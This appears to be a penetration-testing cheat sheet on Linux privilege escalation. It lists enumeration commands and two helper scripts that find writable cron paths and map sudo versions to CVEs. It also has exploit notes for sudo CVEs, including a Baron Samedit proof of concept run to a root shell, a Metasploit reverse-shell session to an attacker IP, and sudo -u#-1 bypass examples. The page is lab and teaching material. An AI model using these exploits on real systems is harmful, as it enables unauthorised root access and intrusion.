# Services & Internals Enum

## **Network Interfaces**

```shell-session
ip a
```

## **Hosts**

```shell-session
cat /etc/hosts
```

## **User's Last Login**

```shell-session
lastlog

Username         Port     From             Latest
root                                       **Never logged in**
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
...SNIP...
systemd-coredump                           **Never logged in**
mrb3n            pts/1    10.10.14.15      Tue Aug  2 19:33:16 +0000 2022
lxd                                        **Never logged in**
bjones                                     **Never logged in**
administrator.ilfreight                           **Never logged in**
backupsvc                                  **Never logged in**
cliff.moore      pts/0    127.0.0.1        Tue Aug  2 19:32:29 +0000 2022
logger                                     **Never logged in**
shared                                     **Never logged in**
stacey.jenkins   pts/0    10.10.14.15      Tue Aug  2 18:29:15 +0000 2022
htb-student      pts/0    10.10.14.15      Wed Aug  3 13:37:22 +0000 2022             
```

## **Logged In Users**

```shell-session
w

 12:27:21 up 1 day, 16:55,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
cliff.mo pts/0    10.10.14.16      Tue19   40:54m  0.02s  0.02s -bash
```

## **Command History**

```shell-session
history

    1  id
    2  cd /home/cliff.moore
    3  exit
    4  touch backup.sh
    5  tail /var/log/apache2/error.log
    6  ssh ec2-user@dmz02.inlanefreight.local
    7  history
```

## **Finding History Files**

```shell-session
find / -type f \( -name "*_hist" -o -name "*_history" \) -exec ls -l {} \; 2>/dev/null
```

The globs must be quoted, otherwise the shell expands them against the current directory before `find` sees them. `history` only shows the current shell's in-memory list; the files found here (`.bash_history`, `.zsh_history`, `.mysql_history`, `.python_history`, ...) are what survives across sessions and across users.

## Services listening

```shell-session
netstat -tulpn
ss -tulpn
```

`netstat` is frequently absent on modern images; `ss -tulpn` (iproute2) gives the same listing. In both, the PID/program column is only populated for sockets owned by your own user unless you run as root, so a blank column still means a process is listening there.

## Cron

```shell-session
ls -la /etc/cron.daily/
```

{% content-ref url="cron-job-abuse" %}
[cron-job-abuse](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/cron-job-abuse)
{% endcontent-ref %}
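The listing above only shows what is in `/etc/cron.daily/`. As an added example (not part of this page or of the linked cron-job-abuse page), the script below parses system-format crontab files (`/etc/crontab` and `/etc/cron.d/*`, which carry a user field between the schedule and the command) and reports every absolute path the jobs reference that the current user can modify, either directly or by creating a missing file in a writable directory. It assumes the seven-field system format with `@reboot`-style shortcuts; the crontab content used to try it is constructed.

```shell
#!/usr/bin/env bash
# Added example: find cron-referenced paths the current user can tamper with.

# Print every absolute path referenced by the command field of a system-format crontab
# (/etc/crontab, /etc/cron.d/*: min hour dom mon dow user command). Comments, blank lines
# and VAR=value assignments are skipped; "@reboot"-style lines carry the user in field 2.
cron_cmd_paths() {
  grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    awk '{
      start = ($1 ~ /^@/) ? 3 : 7
      for (i = start; i <= NF; i++) {
        tok = $i
        sub(/[;&|)]+$/, "", tok)          # strip trailing shell punctuation ("cmd;", "cmd&&")
        if (tok ~ /^\/./) print tok       # keep absolute paths only, ignore a bare "/"
      }
    }' | sort -u
}

# For each referenced path, report whether the current user could change what cron runs:
# the file itself is writable, or it does not exist yet and its directory is writable.
cron_writable_paths() {
  cron_cmd_paths "$1" | while IFS= read -r p; do
    if [ -w "$p" ]; then
      echo "writable: $p"
    elif [ ! -e "$p" ] && [ -w "$(dirname "$p")" ]; then
      echo "missing, dir writable: $p"
    fi
  done
}

# Stand-alone use: pass crontab files as arguments, or none to scan the usual locations.
if [ "$#" -eq 0 ]; then
  for f in /etc/crontab /etc/cron.d/*; do
    [ -f "$f" ] && cron_writable_paths "$f"
  done
else
  for f in "$@"; do cron_writable_paths "$f"; done
fi
```

Per-user crontabs under `/var/spool/cron/` have no user field and are not readable without root, so they are out of scope here; a "missing, dir writable" hit is the classic case of a job calling a script that was deleted from a world-writable directory such as `/tmp`.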

## Proc

```shell-session
find /proc -maxdepth 2 -name cmdline -exec sh -c 'tr "\0" " " < "$1"; echo' _ {} \; 2>/dev/null
```

Arguments in `/proc/<pid>/cmdline` are NUL-separated, so running `tr " " "\n"` over the raw data does nothing useful; the command above prints one process per line. `cmdline` is world-readable unless `/proc` is mounted with `hidepid`, which is why passwords and tokens passed on the command line by other users' processes show up here.

## **Installed Packages**

```shell-session
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
```

`apt list` only exists on Debian-based systems; on RPM-based hosts use `rpm -qa` to build the same list. The file is reused by the GTFOBins loop further down.

## Sudo version

```shell-session
sudo -V
```

```shell-session
sudo --version
```

The LinPEAS-style grep below flags builds older than 1.8.28, i.e. the ones affected by CVE-2019-14287 (the `-u#-1` bypass). The original pattern's `\*` is a literal asterisk in a basic regex, so it never matched 1.8.10 to 1.8.19; this version uses an extended regex with a digit boundary so that 1.8.28 and later are not reported.

```shell-session
sudo -V | grep -E "^Sudo version (1\.[0-7]\.|1\.8\.(1?[0-9]|2[0-7])($|[^0-9]))"
```
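A single grep only answers one question. As an added example (not from the original page), the script below converts a sudo version string, p-revision included, into a comparable number and maps it onto the affected ranges of every CVE documented in the sections that follow on this page (CVE-2019-14287, CVE-2019-18634, CVE-2021-3156, CVE-2023-22809, CVE-2025-32463). The range boundaries are the ones stated on this page, with CVE-2025-32463 ending at 1.9.17 because 1.9.17p1 is the fix; the encoding assumes p-revisions below 100.

```shell
#!/usr/bin/env bash
# Added example: classify a sudo version against the CVE ranges listed on this page.

# Turn "1.8.31p2" into one comparable integer: major*10^6 + minor*10^4 + patch*10^2 + p-rev.
# Assumption: every component, including the p-revision, stays below 100.
sudo_vernum() {
  local v=$1 major minor patch prev=0
  case $v in *p*) prev=${v##*p}; v=${v%%p*};; esac
  major=${v%%.*}; v=${v#*.}
  minor=${v%%.*}
  case $v in *.*) patch=${v#*.};; *) patch=0;; esac
  echo $(( major * 1000000 + minor * 10000 + patch * 100 + prev ))
}

# True if version $1 lies in the inclusive range [$2, $3].
in_range() {
  local n lo hi
  n=$(sudo_vernum "$1"); lo=$(sudo_vernum "$2"); hi=$(sudo_vernum "$3")
  [ "$n" -ge "$lo" ] && [ "$n" -le "$hi" ]
}

# Print, space separated, the CVEs whose affected range contains the given version.
sudo_cves() {
  local v=$1 hits=""
  # CVE-2019-14287 (-u#-1 bypass): every release before 1.8.28; needs a (ALL, !root) rule.
  in_range "$v" 1.0 1.8.27p99 && hits="$hits CVE-2019-14287"
  # CVE-2019-18634 (pwfeedback overflow): before 1.8.26; needs pwfeedback in sudoers.
  in_range "$v" 1.0 1.8.25p99 && hits="$hits CVE-2019-18634"
  # CVE-2021-3156 (Baron Samedit): legacy 1.8.2 - 1.8.31p2 and stable 1.9.0 - 1.9.5p1.
  { in_range "$v" 1.8.2 1.8.31p2 || in_range "$v" 1.9.0 1.9.5p1; } && hits="$hits CVE-2021-3156"
  # CVE-2023-22809 (sudoedit extra files): 1.8.0 - 1.9.12p1; needs a sudoedit rule.
  in_range "$v" 1.8.0 1.9.12p1 && hits="$hits CVE-2023-22809"
  # CVE-2025-32463 (chroot / "chwoot"): 1.9.14 - 1.9.17, fixed in 1.9.17p1; no rule needed.
  in_range "$v" 1.9.14 1.9.17 && hits="$hits CVE-2025-32463"
  echo "${hits# }"
}

# Stand-alone use: ./sudo_cves.sh [version]; with no argument, read the host's own sudo.
v=${1:-$(command -v sudo >/dev/null 2>&1 && sudo -V 2>/dev/null | sed -n 's/^Sudo version //p' | head -n 1)}
[ -n "$v" ] && echo "sudo $v: $(sudo_cves "$v")"
```

A hit only means the upstream range matches: distributions backport fixes without bumping the version, so confirm against the distro changelog (`apt changelog sudo`, `rpm -q --changelog sudo`) before spending time on an exploit.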

### CVE-2025-32463 – sudo chroot ("chwoot")

Affects **sudo 1.9.14** through **1.9.17**; fixed in 1.9.17p1. The bug is in the `--chroot` (`-R`) option: sudo resolves NSS from inside the user-supplied chroot directory, so a crafted `/etc/nsswitch.conf` placed there makes the root process load an attacker-controlled shared object. No sudoers entry is needed, only a build with chroot support (the default), which is why most distributions shipping these versions were exposed.

{% embed url="<https://github.com/kh4sh3i/CVE-2025-32463>" %}

{% embed url="<https://github.com/pr0v3rbs/CVE-2025-32463_chwoot>" %}

{% embed url="<https://github.com/K3ysTr0K3R/CVE-2025-32463-EXPLOIT>" %}

### Sudo < 1.8.28 (CVE-2019-14287)

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}

### Sudoedit Privesc - CVE 2023-22809

Affected sudo versions: 1.8.0 to 1.9.12p1 (fixed in 1.9.12p2). Requires a sudoers rule granting `sudoedit` (`sudo -e`) on some file: an editor string such as `EDITOR='vim -- /etc/sudoers'` passed through `SUDO_EDITOR`, `VISUAL` or `EDITOR` smuggles extra arguments past the argument check, so the editor opens additional, arbitrary files as root.

* Poc: <https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc>
* Metasploit:

`exploit/linux/local/sudoedit_bypass_priv_esc`

### Baron Samedit - CVE-2021-3156

Affected: legacy releases 1.8.2 to 1.8.31p2 and stable releases 1.9.0 to 1.9.5p1 (fixed in 1.8.32 and 1.9.5p2). It is a heap overflow in the argument escaping done for `sudoedit -s`, so no sudoers rule is required.

* 1.8.31 - Ubuntu 20.04
* 1.8.27 - Debian 10
* 1.9.2 - Fedora 33
* and others

#### Debian 10 (Sudo 1.8.27)

{% embed url="<https://github.com/0xdevil/CVE-2021-3156>" %}

#### Ubuntu 20.04 (Sudo 1.8.31)

{% embed url="<https://github.com/CptGibbon/CVE-2021-3156>" %}

#### Poc All In One

{% embed url="<https://github.com/blasty/CVE-2021-3156>" %}

```shell-session
$ git clone https://github.com/blasty/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make

rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
```

```shell-session
$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
```

```shell-session
$ cat /etc/lsb-release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"
```

```shell-session
~$ ./sudo-hax-me-a-sandwich 1

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **

# id

uid=0(root) gid=0(root) groups=0(root)
```

* Metasploit exploit:

```
msf6 exploit(linux/local/sudo_baron_samedit) > set session 3
session => 3
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost tun0
lhost => 10.10.16.110
msf6 exploit(linux/local/sudo_baron_samedit) > set lport 443
lport => 443
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 10.10.16.110:443 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/D9M8vioM30.py' (763 bytes) ...
[*] Writing '/tmp/libnss_CcyrQ/Q .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/D9M8vioM30.py
[+] Deleted /tmp/libnss_CcyrQ/Q .so.2
[+] Deleted /tmp/libnss_CcyrQ
[*] Meterpreter session 4 opened (10.10.16.110:443 -> 10.129.203.52:50308) at 2024-04-08 08:23:25 -0400

meterpreter > ls
Listing: /tmp
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100755/rwxr-xr-x  207   fil   2024-04-08 08:20:01 -0400  cPGjXRBL

meterpreter > getuid
Server username: root
meterpreter > 
```

### CVE-2019-18634 - Sudo before 1.8.26

Only exploitable when `pwfeedback` is enabled in `/etc/sudoers` (off by default upstream, but shipped on by some distributions, e.g. Linux Mint and elementary OS). Check the `Matching Defaults entries` block of `sudo -l` for `pwfeedback`; asterisks echoed while typing the password are the visible symptom.

{% embed url="<https://github.com/saleemrashid/sudo-cve-2019-18634/>" %}

### All versions below 1.8.28 - CVE-2019-14287

{% hint style="info" %}
Single prerequisite: a sudoers rule that lets the user run some command as any user except root, e.g. `(ALL, !root) /bin/bash`. `sudo -u#-1` (or `-u#4294967295`) passes the `!root` check because -1 is not uid 0, but `setresuid(-1)` means "leave unchanged", so the already-root sudo process keeps uid 0. That is why the resulting shell shows `uid=0(root)` while the gid stays the caller's own.
{% endhint %}

#### Example 1

```shell-session
$ sudo -l
[sudo] password for cry0l1t3: **********

User cry0l1t3 may run the following commands on Penny:
    ALL=(ALL) /usr/bin/id
```

```shell-session
$ sudo -u#-1 id

root@nix02:/home/cry0l1t3# id

uid=0(root) gid=1005(cry0l1t3) groups=1005(cry0l1t3)
```

#### Example 2

```shell-session
$ sudo -l 
Matching Defaults entries for htb-student on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on ubuntu:
    (ALL, !root) /bin/ncdu
```

```shell-session
$ sudo -u#-1 /bin/ncdu
```

Press `b` inside ncdu to spawn a shell in the current directory; it inherits the uid 0 context.

```
$ sudo -u#-1 /bin/ncdu
# id
uid=0(root) gid=1001(htb-student) groups=1001(htb-student)
# 

```

#### Example 3

```
sudo -l
Password: 
Matching Defaults entries for user on XXX-NIX04:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User ben may run the following commands on XXX-NIX04:
    (ALL, !root) /bin/bash
```

```
$ sudo -u#-1 /bin/bash
root@XXX-NIX04:/home/user# 
```

{% embed url="<https://github.com/nu11secur1ty/Linux_hardening_and_security/blob/master/Sudo/README.MD>" %}

#### Example 4 - iptables and iptables-save

{% embed url="<https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/>" %}

### **More exploits**

{% embed url="<https://0xss0rz.github.io/2021-05-11-THM-Sudo-Vulns/>" %}

* Sudo Buffer Overflow (CVE-2019-18634, version < 1.8.26)
* Sudo Security Bypass (CVE-2019-14287, version < 1.8.28)

## Binaries

```shell-session
ls -l /bin /usr/bin/ /usr/sbin/
```

{% content-ref url="vulnerable-services" %}
[vulnerable-services](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/vulnerable-services)
{% endcontent-ref %}

### GTFOBins

```shell-session
for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done
```

{% content-ref url="suid-sgid" %}
[suid-sgid](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/suid-sgid)
{% endcontent-ref %}

## **Trace System Calls**

```shell-session
strace ping -c1 10.129.112.20
```

## Configuration files

```shell-session
find / -type f \( -name "*.conf" -o -name "*.config" \) -exec ls -l {} \; 2>/dev/null
```

Quote the globs so the shell does not expand them against the current directory. The `ls -l` output is what matters here: a configuration file that is writable by your user or group, or that is readable when it should not be (database and service credentials), is the lead to follow.

{% content-ref url="credentials-hunting" %}
[credentials-hunting](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/credentials-hunting)
{% endcontent-ref %}

## Scripts

```shell-session
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
```

## **Running Services by User**

```shell-session
ps aux | grep root
```
